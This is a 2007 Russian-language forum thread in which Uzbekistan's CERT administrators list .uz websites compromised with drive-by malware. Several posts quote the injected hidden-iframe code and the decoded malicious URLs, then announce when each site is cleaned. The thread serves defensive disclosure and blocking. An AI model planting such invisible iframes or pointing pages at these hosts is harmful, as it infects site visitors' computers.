Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > GLOBAL > Информационная безопасность > UZ-CERT
Знаете ли Вы, что ...
...для каждой темы существует свой раздел. Изучите структуру форума. Если соответствующего раздела нет, то всегда есть раздел "Разное" :)
<< Предыдущий совет - Случайный совет - Следующий совет >>

UZ-CERT Служба реагирования на компьютерные инциденты / Computer Emergency Response Team (cert.uz). Раздел UZINFOCOM


Закрыто

 
Опции темы Опции просмотра
Старый 19.09.2007 15:08   #1  
Real ID Group Ultimate uParty Member Администратор
Аватар для Eldar Ishimbaev
Оффлайн
UZINFOCOM
Заместитель директора
Сообщений: 4,901
+ 435  2,423/1,403
– 13  36/20

Uzbekistan
Exclamation Лента: УГРОЗЫ НА САЙТАХ .UZ

Уважаемые пользователи!

В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами.

По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса.

Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.
__________________
Вы всё ещё не знаете правил uForum?|Лица uForum'а|Закладки|Как отключить нежелательные разделы|RSS-ленты uForum'а|Статистика uForum'а

Последний раз редактировалось Eldar Ishimbaev; 19.09.2007 в 15:11.
Старый 19.09.2007 15:29   #2  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.

Первая вредоносная ссылка:

Код HTML:
<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>
Вторая вредоносная ссылка:

Код HTML:
<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>
Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:28.
Старый 20.09.2007 14:33   #3  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.arksugurta.uz

На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->
После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 24.09.2007 в 10:59.
"+" от:
Старый 20.09.2007 14:42   #4  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.elgroup.uz

На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 7 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25.
Старый 20.09.2007 14:46   #5  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.innovation.uz

На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25.
Старый 20.09.2007 14:50   #6  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.iptv.uz

На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте файла index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26.
Старый 20.09.2007 15:38   #7  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
roller.sarkor.uz

На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.

Первая ссылка:

Код:
<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe>
Вторая ссылка:

Код:
<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe>
Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Последний раз редактировалось Dmitry Paleev; 20.09.2007 в 17:07.
Реклама и уведомления
Старый 20.09.2007 15:50   #8  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.versal.uz

На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 3 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26.
Старый 20.09.2007 15:55   #9  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.asus.uz

На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 1 месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27.
Старый 20.09.2007 15:59   #10  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
www.glob.uz

На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 9 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27.
Закрыто
Опции темы
Опции просмотра




Здесь представлены форумы: UZINFOCOM, ЦППМП, ГКСИТТ, PC.UZ, Microsoft, IBM, HP, Fujitsu, D-Link, Intel, Ассоциация IT, InfoCOM.UZ, BANK.UZ, ActiveCloud, Sarkor Telecom, BUZTON, Cisco Systems, NetDec, EVO, Sharq Telekom, EPSON, Cron Telecom.
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
Центр UZINFOCOM


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх